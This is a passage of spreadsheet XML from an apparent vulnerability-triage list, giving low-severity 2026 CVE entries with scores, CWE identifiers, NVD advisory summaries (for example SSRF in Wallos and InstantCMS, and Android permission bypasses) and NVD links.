t="inlineStr"><is><t>New</t></is></c><c r="C2291" s="5" t="inlineStr"><is><t>CVE-2026-76961</t></is></c><c r="D2291" s="5" t="n"><v>3.5</v></c><c r="E2291" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2291" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G2291" s="5" t="inlineStr" /><c r="H2291" s="5" t="n"><v>0.001</v></c><c r="I2291" s="5" t="inlineStr" /><c r="J2291" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K2291" s="5" t="inlineStr" /><c r="L2291" s="5" t="inlineStr" /><c r="M2291" s="5" t="inlineStr" /><c r="N2291" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2291" s="5" t="inlineStr" /><c r="Q2291" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R2291" s="5" t="inlineStr"><is><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is></c><c r="S2291" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76961</t></is></c></row><row r="2292"><c r="A2292" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2292" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2292" s="5" t="inlineStr"><is><t>CVE-2026-77351</t></is></c><c r="D2292" s="5" t="n"><v>3.5</v></c><c r="E2292" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2292" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2292" s="5" t="inlineStr" /><c r="H2292" s="5" t="n"><v>0.002</v></c><c r="I2292" s="5" t="inlineStr" /><c r="J2292" s="5" t="inlineStr" /><c r="K2292" s="5" t="inlineStr" /><c r="L2292" s="5" t="inlineStr" /><c r="M2292" s="5" t="inlineStr" /><c r="N2292" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2292" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2292" s="5" t="inlineStr" /><c r="Q2292" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R2292" s="5" t="inlineStr"><is><t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 5.0.0, Wallos lets any authenticated user store an arbitrary SMTP host — including private and cloud-metadata IP addresses — in their personal email notification settings, with no server-side SSRF validation. When the scheduled notification cron job runs, it passes the stored host directly to PHPMailer, causing the Wallos server to open an outbound TCP connection to whatever address the attacker specified. This gives a low-privileged attacker a reliable mechanism to probe internal network services from the server's perspective. This issue has been patched in version 5.0.0.</t></is></c><c r="S2292" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77351</t></is></c></row><row r="2293"><c r="A2293" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2293" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2293" s="5" t="inlineStr"><is><t>CVE-2026-0054</t></is></c><c r="D2293" s="5" t="n"><v>3.3</v></c><c r="E2293" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2293" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2293" s="5" t="inlineStr" /><c r="H2293" s="5" t="n"><v>0.001</v></c><c r="I2293" s="5" t="inlineStr" /><c r="J2293" s="5" t="inlineStr" /><c r="K2293" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L2293" s="5" t="inlineStr" /><c r="M2293" s="5" t="inlineStr" /><c r="N2293" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2293" s="5" t="inlineStr" /><c r="Q2293" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2293" s="5" t="inlineStr"><is><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is></c><c r="S2293" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0054</t></is></c></row><row r="2294"><c r="A2294" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2294" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2294" s="5" t="inlineStr"><is><t>CVE-2026-28582</t></is></c><c r="D2294" s="5" t="n"><v>3.3</v></c><c r="E2294" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2294" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2294" s="5" t="inlineStr" /><c r="H2294" s="5" t="n"><v>0.001</v></c><c r="I2294" s="5" t="inlineStr" /><c r="J2294" s="5" t="inlineStr" /><c r="K2294" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L2294" s="5" t="inlineStr" /><c r="M2294" s="5" t="inlineStr" /><c r="N2294" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2294" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2294" s="5" t="inlineStr" /><c r="Q2294" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2294" s="5" t="inlineStr"><is><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is></c><c r="S2294" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28582</t></is></c></row><row r="2295"><c r="A2295" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2295" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2295" s="5" t="inlineStr"><is><t>CVE-2026-28622</t></is></c><c r="D2295" s="5" t="n"><v>3.3</v></c><c r="E2295" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2295" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2295" s="5" t="inlineStr" /><c r="H2295" s="5" t="n"><v>0.001</v></c><c r="I2295" s="5" t="inlineStr" /><c r="J2295" s="5" t="inlineStr" /><c r="K2295" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L2295" s="5" t="inlineStr" /><c r="M2295" s="5" t="inlineStr" /><c r="N2295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2295" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2295" s="5" t="inlineStr" /><c r="Q2295" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2295" s="5" t="inlineStr"><is><t>In getQueryBuilderInternal of MediaProvider.java, there is a possible way to retrieve location metadata due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S2295" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28622</t></is></c></row><row r="2296"><c r="A2296" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2296" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2296" s="5" t="inlineStr"><is><t>CVE-2026-28623</t></is></c><c r="D2296" s="5" t="n"><v>3.3</v></c><c r="E2296" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2296" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2296" s="5" t="inlineStr" /><c r="H2296" s="5" t="n"><v>0.001</v></c><c r="I2296" s="5" t="inlineStr" /><c r="J2296" s="5" t="inlineStr" /><c r="K2296" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L2296" s="5" t="inlineStr" /><c r="M2296" s="5" t="inlineStr" /><c r="N2296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2296" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2296" s="5" t="inlineStr" /><c r="Q2296" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2296" s="5" t="inlineStr"><is><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is></c><c r="S2296" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28623</t></is></c></row><row r="2297"><c r="A2297" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2297" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2297" s="5" t="inlineStr"><is><t>CVE-2026-28630</t></is></c><c r="D2297" s="5" t="n"><v>3.3</v></c><c r="E2297" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2297" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2297" s="5" t="inlineStr" /><c r="H2297" s="5" t="n"><v>0.001</v></c><c r="I2297" s="5" t="inlineStr" /><c r="J2297" s="5" t="inlineStr" /><c r="K2297" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L2297" s="5" t="inlineStr" /><c r="M2297" s="5" t="inlineStr" /><c r="N2297" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2297" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2297" s="5" t="inlineStr" /><c r="Q2297" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="R2297" s="5" t="inlineStr"><is><t>In onCreate of ContactsPickerActivity.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S2297" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28630</t></is></c></row><row r="2298"><c r="A2298" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2298" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2298" s="5" t="inlineStr"><is><t>CVE-2026-28638</t></is></c><c r="D2298" s="5" t="n"><v>3.3</v></c><c r="E2298" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2298" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2298" s="5" t="inlineStr" /><c r="H2298" s="5" t="n"><v>0.001</v></c><c r="I2298" s="5" t="inlineStr" /><c r="J2298" s="5" t="inlineStr" /><c r="K2298" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L2298" s="5" t="inlineStr" /><c r="M2298" s="5" t="inlineStr" /><c r="N2298" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2298" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2298" s="5" t="inlineStr" /><c r="Q2298" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R2298" s="5" t="inlineStr"><is><t>In multiple functions of XmpDataParser.java, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S2298" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28638</t></is></c></row><row r="2299"><c r="A2299" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2299" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2299" s="5" t="inlineStr"><is><t>CVE-2026-28660</t></is></c><c r="D2299" s="5" t="n"><v>3.3</v></c><c r="E2299" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2299" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2299" s="5" t="inlineStr" /><c r="H2299" s="5" t="n"><v>0.001</v></c><c r="I2299" s="5" t="inlineStr" /><c r="J2299" s="5" t="inlineStr" /><c r="K2299" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L2299" s="5" t="inlineStr" /><c r="M2299" s="5" t="inlineStr" /><c r="N2299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2299" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2299" s="5" t="inlineStr" /><c r="Q2299" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R2299" s="5" t="inlineStr"><is><t>In getAllSessions of multiple files, there is a possible confused deputy due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S2299" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28660</t></is></c></row><row r="2300"><c r="A2300" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2300" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2300" s="5" t="inlineStr"><is><t>CVE-2026-28671</t></is></c><c r="D2300" s="5" t="n"><v>3.3</v></c><c r="E2300" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2300" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2300" s="5" t="inlineStr" /><c r="H2300" s="5" t="n"><v>0.001</v></c><c r="I2300" s="5" t="inlineStr" /><c r="J2300" s="5" t="inlineStr" /><c r="K2300" s="5" t="inlineStr" /><c r="L2300" s="5" t="inlineStr" /><c r="M2300" s="5" t="inlineStr" /><c r="N2300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2300" s="5" t="inlineStr" /><c r="Q2300" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="R2300" s="5" t="inlineStr"><is><t>In updateInternal of MediaProvider.java, there is a possible expose contents of files due to a race condition. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S2300" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28671</t></is></c></row><row r="2301"><c r="A2301" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2301" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2301" s="5" t="inlineStr"><is><t>CVE-2026-45519</t></is></c><c r="D2301" s="5" t="n"><v>3.3</v></c><c r="E2301" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2301" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2301" s="5" t="inlineStr" /><c r="H2301" s="5" t="n"><v>0.001</v></c><c r="I2301" s="5" t="inlineStr" /><c r="J2301" s="5" t="inlineStr" /><c r="K2301" s="5" t="inlineStr" /><c r="L2301" s="5" t="inlineStr" /><c r="M2301" s="5" t="inlineStr" /><c r="N2301" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2301" s="5" t="inlineStr" /><c r="Q2301" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R2301" s="5" t="inlineStr"><is><t>In screenArgsForPermissionCheckIfAny of multiple locations there is a possible risk of unauthorized access due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S2301" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45519</t></is></c></row><row r="2302"><c r="A2302" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2302" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2302" s="5" t="inlineStr"><is><t>CVE-2026-45521</t></is></c><c r="D2302" s="5" t="n"><v>3.3</v></c><c r="E2302" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2302" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2302" s="5" t="inlineStr" /><c r="H2302" s="5" t="n"><v>0.001</v></c><c r="I2302" s="5" t="inlineStr" /><c r="J2302" s="5" t="inlineStr" /><c r="K2302" s="5" t="inlineStr" /><c r="L2302" s="5" t="inlineStr" /><c r="M2302" s="5" t="inlineStr" /><c r="N2302" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2302" s="5" t="inlineStr" /><c r="Q2302" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R2302" s="5" t="inlineStr"><is><t>In openFile of AppFuseBridge.java, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S2302" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45521</t></is></c></row><row r="2303"><c r="A2303" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2303" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2303" s="5" t="inlineStr"><is><t>CVE-2026-45525</t></is></c><c r="D2303" s="5" t="n"><v>3.3</v></c><c r="E2303" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2303" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2303" s="5" t="inlineStr" /><c r="H2303" s="5" t="n"><v>0.001</v></c><c r="I2303" s="5" t="inlineStr" /><c r="J2303" s="5" t="inlineStr" /><c r="K2303" s="5" t="inlineStr" /><c r="L2303" s="5" t="inlineStr" /><c r="M2303" s="5" t="inlineStr" /><c r="N2303" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2303" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2303" s="5" t="inlineStr" /><c r="Q2303" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R2303" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S2303" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45525</t></is></c></row><row r="2304"><c r="A2304" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2304" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2304" s="5" t="inlineStr"><is><t>CVE-2026-55290</t></is></c><c r="D2304" s="5" t="n"><v>3.3</v></c><c r="E2304" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2304" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2304" s="5" t="inlineStr" /><c r="H2304" s="5" t="n"><v>0.001</v></c><c r="I2304" s="5" t="inlineStr" /><c r="J2304" s="5" t="inlineStr" /><c r="K2304" s="5" t="inlineStr" /><c r="L2304" s="5" t="inlineStr" /><c r="M2304" s="5" t="inlineStr" /><c r="N2304" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2304" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2304" s="5" t="inlineStr" /><c r="Q2304" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="R2304" s="5" t="inlineStr"><is><t>In setTo of ResourceTypes.cpp, there is a possible out-of-bounds heap read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S2304" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55290</t></is></c></row><row r="2305"><c r="A2305" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2305" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2305" s="5" t="inlineStr"><is><t>CVE-2026-86564</t></is></c><c r="D2305" s="5" t="n"><v>3.3</v></c><c r="E2305" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2305" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G2305" s="5" t="inlineStr" /><c r="H2305" s="5" t="n"><v>0.001</v></c><c r="I2305" s="5" t="inlineStr" /><c r="J2305" s="5" t="inlineStr" /><c r="K2305" s="5" t="inlineStr" /><c r="L2305" s="5" t="inlineStr" /><c r="M2305" s="5" t="inlineStr" /><c r="N2305" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2305" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2305" s="5" t="inlineStr" /><c r="Q2305" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2305" s="5" t="inlineStr"><is><t>A flaw was found in DPDK lib/vhost. Missing length validation before reading command_data in the virtio-net control-queue handler can cause an out-of-bounds read and a host process crash.</t></is></c><c r="S2305" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86564</t></is></c></row><row r="2306"><c r="A2306" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2306" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2306" s="5" t="inlineStr"><is><t>CVE-2026-28652</t></is></c><c r="D2306" s="5" t="n"><v>3.1</v></c><c r="E2306" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2306" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2306" s="5" t="inlineStr" /><c r="H2306" s="5" t="n"><v>0.002</v></c><c r="I2306" s="5" t="inlineStr" /><c r="J2306" s="5" t="inlineStr" /><c r="K2306" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L2306" s="5" t="inlineStr" /><c r="M2306" s="5" t="inlineStr" /><c r="N2306" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2306" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2306" s="5" t="inlineStr" /><c r="Q2306" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2306" s="5" t="inlineStr"><is><t>In multiple functions of RangingServiceImpl.java, there is a possible MITM due to a missing permission check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S2306" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28652</t></is></c></row><row r="2307"><c r="A2307" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2307" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2307" s="5" t="inlineStr"><is><t>CVE-2026-48707</t></is></c><c r="D2307" s="5" t="n"><v>3.1</v></c><c r="E2307" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2307" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2307" s="5" t="inlineStr" /><c r="H2307" s="5" t="n"><v>0.002</v></c><c r="I2307" s="5" t="inlineStr" /><c r="J2307" s="5" t="inlineStr" /><c r="K2307" s="5" t="inlineStr" /><c r="L2307" s="5" t="inlineStr" /><c r="M2307" s="5" t="inlineStr" /><c r="N2307" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2307" s="5" t="inlineStr" /><c r="Q2307" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R2307" s="5" t="inlineStr"><is><t>InstantCMS is a free and open source content management system. Versions prior to 2.18.2 have a Server-Side Request Forgery (SSRF) vulnerability in the file upload functionality (`system/core/uploader.php` at lines 509-532). When the "upload from URL" feature follows an HTTP redirect, the redirected target URL bypasses the private IP address blacklist check. This allows authenticated users to scan and access internal network services. Version 2.18.2 contains a fix.</t></is></c><c r="S2307" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48707</t></is></c></row><row r="2308"><c r="A2308" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2308" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2308" s="5" t="inlineStr"><is><t>CVE-2026-84066</t></is></c><c r="D2308" s="5" t="n"><v>3.1</v></c><c r="E2308" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2308" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2308" s="5" t="inlineStr" /><c r="H2308" s="5" t="n"><v>0.001</v></c><c r="I2308" s="5" t="inlineStr" /><c r="J2308" s="5" t="inlineStr" /><c r="K2308" s="5" t="inlineStr" /><c r="L2308" s="5" t="inlineStr" /><c r="M2308" s="5" t="inlineStr" /><c r="N2308" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2308" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2308" s="5" t="inlineStr" /><c r="Q2308" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2308" s="5" t="inlineStr"><is><t>The Directorist: AI-Powered Business Directory, Listings &amp; Classified Ads WordPress plugin before 8.9 does not verify that the requesting user owns the post being modified before writing uploaded file references to its metadata, allowing users with the subscriber role and above to overwrite image metadata on posts belonging to other users.</t></is></c><c r="S2308" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84066</t></is></c></row><row r="2309"><c r="A2309" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2309" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2309" s="5" t="inlineStr"><is><t>CVE-2026-84389</t></is></c><c r="D2309" s="5" t="n"><v>3.1</v></c><c r="E2309" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2309" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G2309" s="5" t="inlineStr" /><c r="H2309" s="5" t="n"><v>0.001</v></c><c r="I2309" s="5" t="inlineStr" /><c r="J2309" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K2309" s="5" t="inlineStr" /><c r="L2309" s="5" t="inlineStr" /><c r="M2309" s="5" t="inlineStr" /><c r="N2309" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2309" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2309" s="5" t="inlineStr" /><c r="Q2309" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="R2309" s="5" t="inlineStr"><is><t>A url redirection to untrusted site ('open redirect') vulnerability in Fortinet FortiSIEM 7.5.0 through 7.5.1, FortiSIEM 7.4.1 through 7.4.2 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t></is></c><c r="S2309" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84389</t></is></c></row><row r="2310"><c r="A2310" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2310" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2310" s="5" t="inlineStr"><is><t>CVE-2026-85052</t></is></c><c r="D2310" s="5" t="n"><v>3.1</v></c><c r="E2310" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2310" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2310" s="5" t="inlineStr" /><c r="H2310" s="5" t="n"><v>0.002</v></c><c r="I2310" s="5" t="inlineStr" /><c r="J2310" s="5" t="inlineStr" /><c r="K2310" s="5" t="inlineStr"><is><t>google:chrome</t></is></c><c r="L2310" s="5" t="inlineStr" /><c r="M2310" s="5" t="inlineStr" /><c r="N2310" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2310" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2310" s="5" t="inlineStr" /><c r="Q2310" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2310" s="5" t="inlineStr"><is><t>Out of bounds read in CrashReporting in Google Chrome prior to 152.0.7977.82 allowed a remote attacker who had compromised the renderer process to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t></is></c><c r="S2310" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85052</t></is></c></row><row r="2311"><c r="A2311" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2311" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2311" s="5" t="inlineStr"><is><t>CVE-2026-86670</t></is></c><c r="D2311" s="5" t="n"><v>2.9</v></c><c r="E2311" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2311" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2311" s="5" t="inlineStr" /><c r="H2311" s="5" t="n"><v>0.003</v></c><c r="I2311" s="5" t="inlineStr" /><c r="J2311" s="5" t="inlineStr" /><c r="K2311" s="5" t="inlineStr" /><c r="L2311" s="5" t="inlineStr" /><c r="M2311" s="5" t="inlineStr" /><c r="N2311" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2311" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2311" s="5" t="inlineStr" /><c r="Q2311" s="5" t="inlineStr"><is><t>CWE-326, CWE-916</t></is></c><c r="R2311" s="5" t="inlineStr"><is><t>A flaw has been found in aircheng-org iWebShop-5 up to 5.15. This impacts an unknown function of the file controllers/admin.php of the component Authentication Storage. Executing a manipulation of the argument Password can lead to password hash with insufficient computational effort. It is possible to launch the attack remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S2311" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86670</t></is></c></row><row r="2312"><c r="A2312" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2312" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2312" s="5" t="inlineStr"><is><t>CVE-2025-15693</t></is></c><c r="D2312" s="5" t="n"><v>2.7</v></c><c r="E2312" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2312" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2312" s="5" t="inlineStr" /><c r="H2312" s="5" t="n"><v>0.003</v></c><c r="I2312" s="5" t="inlineStr" /><c r="J2312" s="5" t="inlineStr" /><c r="K2312" s="5" t="inlineStr" /><c r="L2312" s="5" t="inlineStr" /><c r="M2312" s="5" t="inlineStr" /><c r="N2312" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2312" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2312" s="5" t="inlineStr" /><c r="Q2312" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c 